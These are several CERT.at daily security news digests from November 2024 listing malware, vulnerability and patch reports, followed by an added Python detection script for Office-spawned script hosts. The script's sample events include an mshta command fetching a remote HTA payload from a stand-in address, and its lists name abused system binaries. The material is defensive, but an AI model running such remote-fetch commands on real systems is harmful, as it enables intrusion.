The New Glove Stealer malware has the ability to bypass Google Chrome’s Application-Bound (App-Bound) encryption to steal browser cookies. The threat actors’ attacks employed social engineering techniques akin to ..
---------------------------------------------
https://heimdalsecurity.com/blog/glove-stealer-malware/
∗∗∗ Against grandparent scams: AI granny to tie up criminals in endless conversations ∗∗∗
---------------------------------------------
An AI-generated granny is meant to keep criminals busy on behalf of O2, criminals who try to swindle money out of real people over the phone. To do so, she is supposed to talk and talk.
---------------------------------------------
https://www.heise.de/news/Gegen-Enkeltrickbetrug-KI-Omi-soll-Kriminelle-in-…
∗∗∗ WordPress plug-in Really Simple Security endangers 4 million websites ∗∗∗
---------------------------------------------
Around four million WordPress sites use the plug-in Really Simple Security. Attackers from the internet can compromise them.
---------------------------------------------
https://www.heise.de/news/Wordpress-Plug-in-Really-Simple-Security-gefaehrd…
∗∗∗ An Interview With the Target & Home Depot Hacker ∗∗∗
---------------------------------------------
In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot…
∗∗∗ Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack ∗∗∗
---------------------------------------------
North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities.
---------------------------------------------
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cl…
∗∗∗ Critical security vulnerability in Laravel Framework - updates available ∗∗∗
---------------------------------------------
A critical security vulnerability has been discovered in the Laravel Framework. The flaw allows attackers to gain unauthorised access to applications and manipulate environment variables via manipulated URLs.
---------------------------------------------
https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-lara…
∗∗∗ Safeguarding Healthcare Organizations from IoMT Risks ∗∗∗
---------------------------------------------
The healthcare industry has undergone significant transformation with the emergence of Internet of Medical Things (IoMT) devices. These devices, ranging from wearable monitors to network imaging systems, collect and process vast ..
---------------------------------------------
https://levelblue.com/blogs/security-essentials/safeguarding-healthcare-org…
∗∗∗ Zero-day exploitation targeting Palo Alto Networks firewall management interfaces ∗∗∗
---------------------------------------------
Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/15/etr-zero-day-exploitation-targe…
∗∗∗ Microsoft Power Pages Misconfigurations Expose Millions of Records Globally ∗∗∗
---------------------------------------------
SaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches.
---------------------------------------------
https://hackread.com/microsoft-power-pages-misconfigurations-data-leak/
∗∗∗ Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation ∗∗∗
---------------------------------------------
Written by: Matthijs Gielen, Jay Christiansen. Background: New solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us—the attackers and defenders—and our battle to improve security through all the noise? Data is everywhere. For most ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-…
∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Against LDAP Injection Threats ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team is highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and giving experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Kubernetes Audit Log “Gotchas” ∗∗∗
---------------------------------------------
How to overcome challenges and security gaps when using K8s audit logs for forensics and attack detection.
---------------------------------------------
https://www.wiz.io/blog/overcoming-kubernetes-audit-log-challenges
∗∗∗ Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control ∗∗∗
---------------------------------------------
Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations - making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers ..
---------------------------------------------
https://socket.dev/blog/massive-npm-malware-campaign-leverages-ethereum-sma…
∗∗∗ PyPI Introduces Digital Attestations to Strengthen Python Package Security ∗∗∗
---------------------------------------------
The Python Package Index (PyPI) has announced support for digital attestations. This new feature allows package maintainers to publish signed digital attestations when uploading their projects, providing an additional layer of trust and verification for users. What Are Digital Attestations? Digital attestations are cryptographic statements or ..
---------------------------------------------
https://socket.dev/blog/pypi-introduces-digital-attestations
∗∗∗ 60 Hours of Cyber Defense: Hong Kong’s Innovative Cybersecurity Drill Begins ∗∗∗
---------------------------------------------
Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for ..
---------------------------------------------
https://thecyberexpress.com/hong-kong-cybersecurity-drill/
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack ∗∗∗
---------------------------------------------
https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-mi…
∗∗∗ [webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) ∗∗∗
---------------------------------------------
https://www.exploit-db.com/exploits/52082
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 13-11-2024 18:00 − Donnerstag 14-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 ∗∗∗
---------------------------------------------
While the FortiJump patch does effectively neutralise the devastating RCE that is FortiJump, we’re still a little concerned about FortiManager’s overall code quality. We note that our som/export vulnerability, ‘FortiJump Higher’, is still functional, even in patched versions, allowing adversaries to elevate from one managed FortiGate appliance to the central FortiManager appliance.
---------------------------------------------
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-2311…
∗∗∗ New PXA Stealer targets government and education sectors for sensitive information ∗∗∗
---------------------------------------------
Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.
---------------------------------------------
https://blog.talosintelligence.com/new-pxa-stealer/
∗∗∗ Advertisers are pushing ad and pop-up blockers using old tricks ∗∗∗
---------------------------------------------
A malvertising campaign using an old school trick was found pushing different ad blockers. [..] In the olden days, that something extra used to be video codecs or specific video players, but now we’ll be told we need a browser extension to “continue watching in safe mode.” [..] To us, this looks like a campaign executed by an affiliate, a company that promotes products or services from another company. If someone buys something through the affiliate’s efforts, the affiliate earns a commission.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-a…
∗∗∗ Crimeware and financial cyberthreats in 2025 ∗∗∗
---------------------------------------------
Kaspersky's GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.
---------------------------------------------
https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/
∗∗∗ Malware: Evading detection with a concatenated ZIP ∗∗∗
---------------------------------------------
IT researchers have discovered malware that evades detection by antivirus scanners by concatenating ZIP files.
---------------------------------------------
https://www.heise.de/-10034752
∗∗∗ Free tool: Security researchers crack ShrinkLocker encryption ∗∗∗
---------------------------------------------
The ShrinkLocker ransomware uses Microsoft's BitLocker to encrypt Windows systems. A decryption tool helps.
---------------------------------------------
https://www.heise.de/-10034933
∗∗∗ PHP Reinfector and Backdoor Malware Target WordPress Sites ∗∗∗
---------------------------------------------
We recently observed a surge in WordPress websites being infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed that the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. Upon deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code into other plugins and database tables wp_posts and wp_options.
---------------------------------------------
https://blog.sucuri.net/2024/11/php-reinfector-and-backdoor-malware-target-…
∗∗∗ Malware Spotlight: A Deep-Dive Analysis of WezRat ∗∗∗
---------------------------------------------
Check Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat, after the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad.
---------------------------------------------
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
∗∗∗ Lazarus Group Targets macOS with RustyAttr Trojan in Fake Job PDFs ∗∗∗
---------------------------------------------
Group-IB has uncovered Lazarus group’s stealthy new trojan and technique of hiding malicious code in extended attributes on macOS.
---------------------------------------------
https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/
=====================
= Vulnerabilities =
=====================
∗∗∗ 4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
This is one of the more serious vulnerabilities that we have reported on in our 12 year history as a security provider for WordPress. This vulnerability affects Really Simple Security, formerly known as Really Simple SSL, installed on over 4 million websites, and allows an attacker to remotely gain full administrative access to a site running the plugin. CVE-2024-10924, CVSS Score: 9.8 (Critical)
---------------------------------------------
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (llama-cpp, mingw-expat, python3.6, webkit2gtk4.0, and xorg-x11-server-Xwayland), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk & java-latest-openjdk and libarchive), Oracle (expat, gstreamer1-plugins-base, kernel, libsoup, podman, and tigervnc), SUSE (buildah, java-1_8_0-openjdk, and switchboard-plug-bluetooth), and Ubuntu (zlib).
---------------------------------------------
https://lwn.net/Articles/998143/
∗∗∗ CISA Releases Nineteen Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
Siemens, Rockwell, Hitachi, 2N, Elvaco, Baxter
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-releases-nineteen-i…
∗∗∗ GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7 ∗∗∗
---------------------------------------------
These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. [..] An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations. CVE-2024-9693, CVE-2024-7404, CVE-2024-8648, CVE-2024-8180, CVE-2024-10240
---------------------------------------------
https://thecyberthrone.in/2024/11/14/gitlab-fixes-high-severity-vulnerabili…
∗∗∗ Drupal: POST File - Critical - Cross Site Scripting, Arbitrary PHP code execution - SA-CONTRIB-2024-060 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-060
∗∗∗ Drupal: POST File - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-059 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-059
∗∗∗ Fortinet: Lack of capacity to filter logs by administrator access ∗∗∗
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-23-267
∗∗∗ Palo Alto: CVE-2024-2551 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-2551
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 12-11-2024 18:00 − Mittwoch 13-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Itsmydata: Hacker once again publishes credit data of Jens Spahn ∗∗∗
---------------------------------------------
First via Bonify, now via Itsmydata: Lilith Wittmann has once again obtained credit data on Jens Spahn. At least his score has improved.
---------------------------------------------
https://www.golem.de/news/itsmydata-hackerin-veroeffentlicht-erneut-bonitae…
∗∗∗ Threats in space (or rather, on Earth): internet-exposed GNSS receivers ∗∗∗
---------------------------------------------
Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.
---------------------------------------------
https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/
∗∗∗ China's Volt Typhoon crew and its botnet surge back with a vengeance ∗∗∗
---------------------------------------------
Ohm, for flux sake. China's Volt Typhoon crew and its botnet are back, compromising old Cisco routers once again to break into critical infrastructure networks and kick off cyberattacks, according to security researchers.
---------------------------------------------
https://www.theregister.com/2024/11/13/china_volt_typhoon_back/
∗∗∗ Electricity provider Tibber hacked, 50,000 German customers affected ∗∗∗
---------------------------------------------
Tibber confirms that hackers broke in and obtained customer data. The data is now being sold on the darknet.
---------------------------------------------
https://www.heise.de/news/Stromanbieter-Tibber-gehackt-50-000-deutsche-Kund…
∗∗∗ Security updates: Zoom Room Client & Co. vulnerable ∗∗∗
---------------------------------------------
The developers are hardening various Zoom apps against possible attacks. Among others, macOS and Windows are affected.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdates-Zoom-Room-Client-Co-angreifbar…
∗∗∗ Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them ∗∗∗
---------------------------------------------
We discuss North Korea's use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this.
---------------------------------------------
https://unit42.paloaltonetworks.com/north-korean-it-workers/
∗∗∗ The November 2024 Security Update Review ∗∗∗
---------------------------------------------
It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the ..
---------------------------------------------
https://www.thezdi.com/blog/2024/11/12/the-november-2024-security-update-re…
∗∗∗ How Italy became an unexpected spyware hub ∗∗∗
---------------------------------------------
Italy is home to six major spyware vendors and one supplier, with many smaller and harder-to-track enterprises emerging all the time, experts say.
---------------------------------------------
https://therecord.media/how-italy-became-an-unexpected-spyware-hub
∗∗∗ Germany warns of potential cyber threats from Russia ahead of snap election ∗∗∗
---------------------------------------------
“We must be especially prepared against threats like hacker attacks, manipulation, and disinformation," German Interior Minister Nancy Faeser said.
---------------------------------------------
https://therecord.media/germany-cyber-threats-russia-elections
∗∗∗ Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions ∗∗∗
---------------------------------------------
Trend Micro's Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpo…
∗∗∗ Bitdefender Finds New ShrinkLocker Ransomware, Releases Its Decryptor Tool ∗∗∗
---------------------------------------------
Bitdefender has released a free decryptor for ShrinkLocker ransomware, which exploits Windows BitLocker to encrypt ..
---------------------------------------------
https://hackread.com/bitdefender-shrinklocker-ransomware-decryptor-tool/
∗∗∗ Emerging Threats: Cybersecurity Forecast 2025 ∗∗∗
---------------------------------------------
Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission. This year’s report draws on insights directly from Google ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-fore…
∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Certificate Services (ADCS) Against Exploitation ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team is highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and giving experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Making Sense of Kubernetes Initial Access Vectors Part 1 – Control Plane ∗∗∗
---------------------------------------------
Explore Kubernetes control plane access vectors, risks, and security strategies to prevent unauthorized access and protect your clusters from potential threats.
---------------------------------------------
https://www.wiz.io/blog/making-sense-of-kubernetes-initial-access-vectors-p…
∗∗∗ Time Boxed Penetration Testing for Web Applications ∗∗∗
---------------------------------------------
This article defines time boxed penetration testing and explains how it’s approached from a methodological standpoint. By focusing on high-risk areas, client-specific priorities, and sampling, time boxed testing can deliver efficient assessments within a limited timeframe.
---------------------------------------------
https://projectblack.io/blog/time-boxed-penetration-testing/
∗∗∗ Killing Filecoin nodes ∗∗∗
---------------------------------------------
By Simone Monica. In January, we identified and reported a vulnerability in the Lotus and Venus clients of the Filecoin network that allowed an attacker to remotely crash a node and trigger a denial of service. This issue is ..
---------------------------------------------
https://blog.trailofbits.com/2024/11/13/killing-filecoin-nodes/
∗∗∗ Fault Injection – Down the Rabbit Hole ∗∗∗
---------------------------------------------
This series of articles describes fault injection attack techniques in order to understand their real potential by testing their limits and applicability with limited hardware (available on the market at an acceptable cost). It explores possible ways of using an attack that, in my opinion, is greatly underestimated.
---------------------------------------------
https://security.humanativaspa.it/fault-injection-down-the-rabbit-hole/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (expat), Fedora (chromium and golang-github-nvidia-container-toolkit), Mageia (curl, expat, mpg123, networkmanager-libreswan, openssl, php-tcpdf, qbittorrent, and x11-server, x11-server-xwayland, and tigervnc), Red Hat (kernel and libsoup), Slackware (mozilla), SUSE (firefox, kernel, python-PyPDF2, and xen), and Ubuntu (dotnet9, ghostscript, linux-aws, linux-oem-6.8, and pydantic).
---------------------------------------------
https://lwn.net/Articles/998044/
∗∗∗ ZDI-24-1472: Veeam Backup Enterprise Manager AuthorizeByVMwareSsoToken Improper Certificate Validation Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1472/
∗∗∗ ZDI-24-1486: (0Day) G DATA Total Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1486/
∗∗∗ Critical Security Vulnerabilities Discovered in MZ Automation’s MMS Client ∗∗∗
---------------------------------------------
https://encs.eu/news/critical-security-vulnerabilities-discovered-in-mz-aut…
∗∗∗ Online Installer DLL Hijacking ∗∗∗
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-24-205
∗∗∗ Fortinet Releases Security Updates for Multiple Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/12/fortinet-releases-securi…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 11-11-2024 18:00 − Tuesday 12-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Amazon employee data published on a hacker forum ∗∗∗
---------------------------------------------
The dataset most likely originates from a property management company and traces back to the critical vulnerability in the Moveit software
---------------------------------------------
https://www.derstandard.at/story/3000000244555/daten-von-amazon-mitarbeiter…
∗∗∗ ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI ∗∗∗
---------------------------------------------
New research reveals two vulnerabilities in Google's Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models.
---------------------------------------------
https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-ve…
∗∗∗ 2023 Top Routinely Exploited Vulnerabilities ∗∗∗
---------------------------------------------
This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise ..
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a
∗∗∗ Building a Resilient Network Architecture: Key Trends for 2025 ∗∗∗
---------------------------------------------
As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against ..
---------------------------------------------
https://levelblue.com/blogs/security-essentials/building-a-resilient-networ…
∗∗∗ LodaRAT: Established malware, new victim patterns ∗∗∗
---------------------------------------------
Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new…
∗∗∗ ICS Security Is a Team Sport ∗∗∗
---------------------------------------------
Brandon Smith discusses some of the challenges an automation engineer faces, Bitsight's partnership with Schneider Electric, and what manufacturers in general are doing to tackle ICS security.
---------------------------------------------
https://www.bitsight.com/blog/ics-security-team-sport
∗∗∗ Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown) ∗∗∗
---------------------------------------------
Well, we’re back again, with yet another fresh-off-the-press bug chain (and associated Interactive Artifact Generator). This time, it’s in Citrix’s “Virtual Apps and Desktops” offering.
---------------------------------------------
https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-n…
∗∗∗ SAP Patch Day: eight new vulnerabilities, one of them high-risk ∗∗∗
---------------------------------------------
Admins can look at the current SAP Patch Day somewhat more calmly: of eight new vulnerabilities, only one is rated high risk.
---------------------------------------------
https://heise.de/-10020168
∗∗∗ Attack of the Evil Baristas ∗∗∗
---------------------------------------------
I use the term “hacklore” to refer to the urban legends surrounding cybersecurity. Hacklore is everywhere, and this holiday season, you’re bound to hear it nonstop: “The Russians will load your phone with malware if you scan QR codes!” or “Hackers will steal your banking details if you use a USB charger at the airport!” and so on.
---------------------------------------------
https://medium.com/@boblord/attack-of-the-evil-baristas-b204436f0853
∗∗∗ Reverse Engineering: Finding Exploits in Video Games ∗∗∗
---------------------------------------------
In this guide, I'll walk you through how I create tools to find exploits in video games for bug bounty programs. Specifically, I'll focus on my research into the game Sword of Convallaria. This exploration is purely for educational purposes. As such, I have removed some of the assets as an exercise for ..
---------------------------------------------
https://shalzuth.com/Blog/FindingExploitsInGames
∗∗∗ Critical WPLMS WordPress Theme Vulnerability Puts Websites at Risk of RCE Attacks ∗∗∗
---------------------------------------------
A newly discovered vulnerability in the WPLMS WordPress theme threatens websites with potential Remote Code Execution (RCE) due to a critical path traversal flaw. CVE-2024-10470, a vulnerability in the WPLMS ..
---------------------------------------------
https://thecyberexpress.com/critical-wplms-wordpress-theme-vulnerability/
∗∗∗ Harnessing Chisel for Covert Operations: Unpacking a Multi-Stage PowerShell Campaign ∗∗∗
---------------------------------------------
The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of ..
---------------------------------------------
https://thecyberexpress.com/new-powershell-campaign/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gstreamer1-plugins-base), Debian (chromium, ghostscript, libarchive, mpg123, ruby-saml, and symfony), Fedora (buildah and podman), Red Hat (buildah, containernetworking-plugins, podman, skopeo, and xorg-x11-server-Xwayland), Slackware (wget), SUSE (pcp), and Ubuntu (linux, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-kvm, ..
---------------------------------------------
https://lwn.net/Articles/997903/
∗∗∗ Citrix Releases Security Updates for NetScaler and Citrix Session Recording ∗∗∗
---------------------------------------------
Citrix released security updates to address multiple vulnerabilities in NetScaler ADC, NetScaler Gateway, and Citrix Session Recording. A cyber threat actor could exploit some of these vulnerabilities to take control ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/12/citrix-releases-security…
∗∗∗ November Security Update ∗∗∗
---------------------------------------------
At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers. Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers. Ivanti is ..
---------------------------------------------
https://www.ivanti.com/blog/november-2024-security-update
∗∗∗ XSA-464 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-464.html
∗∗∗ XSA-463 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-463.html
∗∗∗ Multiple vulnerabilities in Siemens Energy Omnivise T3000 ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-schwachstelen…
∗∗∗ Zyxel security advisory for post-authentication command injection and buffer overflow vulnerabilities in GS1900 series switches ∗∗∗
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 08-11-2024 18:00 − Monday 11-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Palo Alto investigates possible vulnerability in the PAN-OS web interface ∗∗∗
---------------------------------------------
Palo Alto is investigating an alleged remote code execution vulnerability in the PAN-OS management interface. A subset of affected customers is being notified. [..] Palo Alto strongly urges customers to ensure that access to the management interface is configured correctly and in line with the recommended best-practice guidelines. The company also provides instructions for this.
---------------------------------------------
https://www.heise.de/-10013896.html
∗∗∗ Credentials from 2023 used for access - "Helldown Leaks" ransomware compromises companies via Zyxel firewalls ∗∗∗
---------------------------------------------
Since roughly the beginning of August 2024, companies around the world have been encrypted by the "Helldown Leaks" ransomware group. Zyxel firewalls can consistently be identified as the initial attack vector, even when they are running the latest software version.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-…
∗∗∗ Testing the Koord2ool ∗∗∗
---------------------------------------------
As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time.
---------------------------------------------
https://www.cert.at/en/blog/2024/11/testing-the-koord2ool
∗∗∗ Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe.
---------------------------------------------
https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html
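The chain described above (an Office document triggering CVE-2017-0199, which pulls an HTA from a remote host and runs it through mshta.exe) leaves a distinctive parent/child trace in process-creation telemetry. The following is an added example and not code from The Hacker News or the Fortinet research it summarises: two small rules run over constructed Sysmon-style process-creation events. The file paths, user name, rule names and the C2 address (192.0.2.10, a documentation address standing in for the real one) are all assumptions. It generalises slightly beyond the article by flagging any script host or LOLBin spawned by an Office application, not only mshta.exe.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Office hosts that open attacker-supplied documents.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins a document has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                       "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed Sysmon-style process-creation events (Event ID 1); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\alice\Downloads\invoice.xlsx"'},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://192.0.2.10/payload.hta'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c whoami"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches."""
    hits = []
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    # Rule 1: an Office application spawned a script host / LOLBin (the CVE-2017-0199 shape).
    if parent in OFFICE_APPS and child in SUSPICIOUS_CHILDREN:
        hits.append("office_spawns_script_host")
    # Rule 2: mshta.exe was handed a remote URL rather than a local .hta file.
    if child == "mshta.exe" and REMOTE_URL.search(event["command_line"]):
        hits.append("mshta_remote_url")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every match, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] {basename(ev['parent_image'])} -> {basename(ev['image'])}: {ev['command_line']}")
```

The local-HTA launch from explorer.exe in the third event is deliberately left unflagged: installers do ship HTA files, and the signal worth paging on is the combination of an Office parent and a remote fetch, which is exactly what the second event shows.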
